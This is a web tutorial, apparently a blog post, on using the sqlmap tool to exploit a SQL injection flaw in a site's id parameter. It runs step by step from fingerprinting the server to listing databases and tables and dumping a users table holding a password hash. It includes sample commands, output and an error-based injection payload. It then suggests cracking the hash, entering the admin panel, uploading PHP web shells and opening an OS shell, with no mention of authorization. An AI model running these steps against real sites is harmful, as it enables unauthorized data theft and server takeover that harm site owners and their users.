For the list of options and parameters that can be used with the sqlmap command, check the following url
https://github.com/sqlmapproject/sqlmap/wiki/Usage
To understand this tutorial you should have a thorough understanding of how database driven web applications work. For example those made with php+mysql.
URLs
Let’s say you have a url like this
http://www.site.com/section.php?id=51
and that it is prone to sql injection because the developer of that site did not properly escape the parameter id. This can be tested simply by trying to open the url
http://www.site.com/section.php?id=51′
We just added a single quote in the parameter. If this url throws an error, then it is clear that the database has reacted with an error because it got an unexpected single quote.
Hacking with sqlmap
Now its time to move on to sqlmap to hack such urls. The sqlmap command is run from the terminal with the python interpreter.
python sqlmap.py -u “http://www.site.com/section.php?id=51”
The above is the first and most simple command to run with the sqlmap tool. It will check the url and try to discover basic information about the system. The output can look something like this
[*] starting at 12:10:33[12:10:33] [INFO] resuming back-end DBMS ‘mysql’
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
—
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
—
[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
So the sqlmap tool has discovered the Operating system, web server, and database along with version information. Even this much is pretty impressive. But it’s time to move on and see what more is this tool capable of.
Discover Databases
In this step, sqlmap shall be used to find out what databases exist on the target system. Again the command is very simple
$ python sqlmap.py -u “http://www.sitemap.com/section.php?id=51” –dbs
The output could be something like this
[*] starting at 12:12:56[12:12:56] [INFO] resuming back-end DBMS ‘mysql’
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
—
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
—
[12:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[*] information_schema
[*] safecosmetics
This time the output contains the available databases list.
Find tables in the database
Now it’s time to find out what tables exist in a particular database. Let’s say the database of interest here is ‘safecosmetics’
Command
$ python sqlmap.py -u “http://www.site.com/section.php?id=51” –tables -D safecosmetics
and the output can be something similar to this
[11:55:18] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: ‘safecosmetics’
[11:55:19] [INFO] heuristics detected web page charset ‘ascii’
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections
[11:55:22] [INFO] retrieved: acl_acl_seq
[11:55:24] [INFO] retrieved: acl_aco
[11:55:25] [INFO] retrieved: acl_aco_map
[11:55:26] [INFO] retrieved: acl_aco_sections
[11:55:28] [INFO] retrieved: acl_aco_sections_seq
………..
Isn’t this amazing? Let’s get the columns of a particular table now.
Get columns of a table
Now that we have the list of tables, it would be a good idea to get the columns of an important table. Lets say the table is ‘users’ and it contains the username and password.
$ python sqlmap.py -u “http://www.site.com/section.php?id=51” –columns -D safecosmetics -T users
The output can be something like this
[12:17:39] [INFO] the back-end DBMS is MySQL web server operating system: FreeBSD web application technology: Apache 2.2.22 back-end DBMS: MySQL 5 [12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics' [12:17:41] [INFO] heuristics detected web page charset 'ascii' [12:17:41] [INFO] the SQL query used returns 8 entries [12:17:42] [INFO] retrieved: id [12:17:43] [INFO] retrieved: int(11) [12:17:45] [INFO] retrieved: name [12:17:46] [INFO] retrieved: text [12:17:47] [INFO] retrieved: password [12:17:48] [INFO] retrieved: text [12:17:49] [INFO] retrieved: permission [12:17:51] [INFO] retrieved: tinyint(4) [12:17:52] [INFO] retrieved: email [12:17:53] [INFO] retrieved: text [12:17:54] [INFO] retrieved: system_home [12:17:55] [INFO] retrieved: text [12:17:57] [INFO] retrieved: system_allow_only [12:17:58] [INFO] retrieved: text [12:17:59] [INFO] retrieved: hash [12:18:01] [INFO] retrieved: varchar(128) Database: safecosmetics Table: users [8 columns] +-------------------+--------------+ | Column | Type | +-------------------+--------------+ | email | text | | hash | varchar(128) | | id | int(11) | | name | text | | password | text | | permission | tinyint(4) | | system_allow_only | text | | system_home | text | +-------------------+--------------+
Now the columns are clearly visible.
Get data from the table
Now comes the most interesting part, extracting data from the table. The command would be
$ python sqlmap.py -u “http://www.site.com/section.php?id=51” –dump -D safecosmetics -T users
The above command will simply dump the data of the particular table, very much like the mysql dump command.
The output might look similar to this
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+ | id | hash | name | email | password | permission | system_home | system_allow_only | +----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+ | 1 | 5DIpzzDHFOwnCvPonu | admin | <blank> | <blank> | 3 | <blank> | <blank> | +----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
The hash column seems to have the password hash. Try cracking the hash and then you will get the login details right away. Sqlmap will create a csv file containing the dump data for easy analysis.
What Next?
Execute arbitrary sql command on the server
This is arguably the easiest thing to do on a server that is vulnerable to sql injection. The sql query parameter can specify an sql query to execute. Things of interest would be to create a user in the users table, or maybe to modify the content of cms pages.
Another parameter, –sql-, shell would give an sql shell-like interface to run queries interactively.
Get inside the admin panel and play
If the website is running some kind of custom cms that has an admin panel, it might be possible to get inside, provided you are able to crack the password retrieved in the database dump. Simple and short passwords can be broken simply by bruteforcing, however long, complex passwords may not be breakable.
Check if the admin panel allows file uploads. If an arbitrary php file can be uploaded, you can have a lot of fun. The php file can contain shell_exec, system, exec, or passthru function calls that allow the execution of arbitary system commands. Php web shell scripts can be uploaded to do the same thing.
Shell on remote OS
You would do this to completely take over a server. Note that it is not as easy and trivial as the tricks above show. Sqlmap comes with a parameter call, –os-shell, that can be used attempt to get a shell on a remote system, but it has many limitations.
According to the Sqlmap manual:
The most important privilege needed by the current database user is to write files through the database functions. This is absent in most cases. Hence this technique will rarely work.
Note
1. Sometimes Sqlmap is unable to connect to the url at all. You will see this when it gets stuck at the first task of “testing connection to the target url.” In such cases, it’s helpful to use the “–random-agent” option. This makes Sqlmap use a valid user agent signature, similar to ones sent by a browser like Chrome or Firefox.
2. Urls that are not in the form of param=value sqlmap cannot automatically know where to inject. For example mvc urls like
.
In such cases, sqlmap needs to be told the injection point marked by a *
http://www.site.com/class_name/method/43*/80
The above will tell sqlmap to inject at the point marked by *
That’s all friends. Special thanks to silver moon for the article.
naserhatami says
hi , i have a problem with my terminal . the output of checking the url is something like this :
[21:55:03] [CRITICAL] all tested parameters appear to be not injectable. Try to
increase ‘–level’/’–risk’ values to perform more tests. Also, you can try to r
erun by providing either a valid value for option ‘–string’ (or ‘–regexp’). If
you suspect that there is some kind of protection mechanism involved (e.g. WAF)
maybe you could retry with an option ‘–tamper’ (e.g. ‘–tamper=space2comment’)
whats the problem?